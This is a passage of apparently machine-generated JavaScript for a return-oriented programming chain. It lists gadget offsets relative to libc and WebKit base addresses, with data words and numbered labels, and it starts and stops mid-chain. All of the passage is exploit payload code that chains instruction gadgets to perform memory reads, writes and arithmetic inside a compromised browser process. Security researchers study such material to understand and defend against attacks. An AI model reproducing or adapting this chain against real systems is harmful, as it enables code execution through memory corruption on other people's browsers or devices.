set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+96520, //L782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L782: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+96616, //L785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L784: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L785: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L786: db([11, 0]); // 0xb set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+96712, //L787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+96728, //L788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L787: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L788: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+96816, //L790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L790: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+96872, //L791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L791: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+96944, //L794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L794: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+97000, //L795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L795: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L797: webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+97136, //L798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L798: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L800: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+97256, //L803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+97240, //L801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L801: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L803: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+97400, //L806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+97368, //L804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+97384, //L805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L804: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L805: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L806: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+97472, //L808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L808: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+97528, //L809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L809: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+97624, //L812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L811: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L812: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L813: db([12, 0]); // 0xc set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+97720, //L814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+97736, //L815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L815: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+97824, //L817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L817: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+97880, //L818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L818: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+97952, //L821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L821: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+98008, //L822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L822: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L824: libc_base+428453, //mov rax, rdx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+98144, //L825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L825: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L827: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+98264, //L830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+98248, //L828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L828: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L830: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+98408, //L833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+98376, //L831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+98392, //L832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L831: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L832: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L833: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+98480, //L835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L835: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+98536, //L836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L836: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+98632, //L839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L838: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L839: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L840: db([13, 0]); // 0xd set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+98728, //L841 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+98744, //L842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L841: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L842: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+98832, //L844 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L844: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+98888, //L845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L845: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+98960, //L848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L848: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+99016, //L849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L849: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L851: libc_base+764760, //pop rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+99152, //L852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L852: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L854: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+99272, //L857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+99256, //L855 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L855: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L857: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+99416, //L860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+99384, //L858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+99400, //L859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L858: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L859: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L860: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+99488, //L862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L862: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+99544, //L863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L863: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+99640, //L866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L865: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L867: db([14, 0]); // 0xe set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+99736, //L868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+99752, //L869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L868: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L869: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+99840, //L871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L871: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+99896, //L872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L872: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+99968, //L875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L875: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+100024, //L876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L876: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+100112, //L878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L878: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L880: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+100232, //L883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+100216, //L881 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L881: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L883: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+100376, //L886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+100344, //L884 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+100360, //L885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L884: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L885: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L886: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+100448, //L888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L888: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+100504, //L889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L889: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+100600, //L892 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L891: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L892: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L893: db([4, 0]); // 0x4 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+100696, //L894 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+100712, //L895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L894: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L895: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+100800, //L897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L897: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+100856, //L898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L898: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+100960, //L900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L900: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L902: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+101080, //L905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+101064, //L903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L903: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L905: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+101224, //L908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+101192, //L906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+101208, //L907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L906: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L907: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L908: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+101296, //L910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L910: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+101352, //L911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L911: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+101448, //L914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L913: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L914: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L915: db([15, 0]); // 0xf set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+101544, //L916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+101560, //L917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L916: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L917: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+101648, //L919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L919: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+101704, //L920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L920: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+101776, //L923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L923: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+101832, //L924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L924: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L926: webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+101968, //L927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L929: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+102088, //L932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+102072, //L930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L930: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L932: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+102232, //L935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+102200, //L933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+102216, //L934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L933: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L934: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L935: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+102304, //L937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L937: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+102360, //L938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L938: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+102456, //L941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L940: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L941: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L942: db([16, 0]); // 0x10 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+102552, //L943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+102568, //L944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L943: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L944: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+102656, //L946 webkit_base+660161, //mov 